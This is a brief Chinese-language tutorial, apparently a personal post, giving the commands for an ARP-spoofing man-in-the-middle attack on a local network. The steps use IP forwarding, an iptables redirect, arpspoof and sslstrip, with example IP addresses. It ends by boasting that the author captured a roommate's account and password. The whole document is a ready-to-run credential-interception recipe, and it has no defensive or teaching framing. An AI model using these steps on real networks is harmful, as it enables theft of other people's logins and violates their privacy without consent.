这里假设 RouteIP:192.168.1.1 OwnIP:192.168.1.100 TargetIP:192.168.1.101
1.echo 1> /proc/sys/net/ipv4/ip_forward
2.cat /proc/sys/net/ipv4/ip_forward 如果显示是1 第一步可以不做
3.iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
4.arpspoof -i eth0 (ifconfig -a 查看所选用网络模块,eth0 有线 )-t (Target IP) (Route IP)
Eg:arpspoof -i eth0 -t 192.168.1.101 192.168.1.1 实现中断
5arpspoof -i eth0 -t (Route IP) (Own IP)
Eg:arpspoof -i eth0 -t 192.168.1.1 192.168.1.100
6.sslstrip -p -l 10000 (实现转发机制)
7.tail -f sslstrip.log (读取转发记录)
现在就可以看到客户端的信息了,http的一般都能截取到,https的就没戏了.呵呵成功获取了室友的账号和密码~~~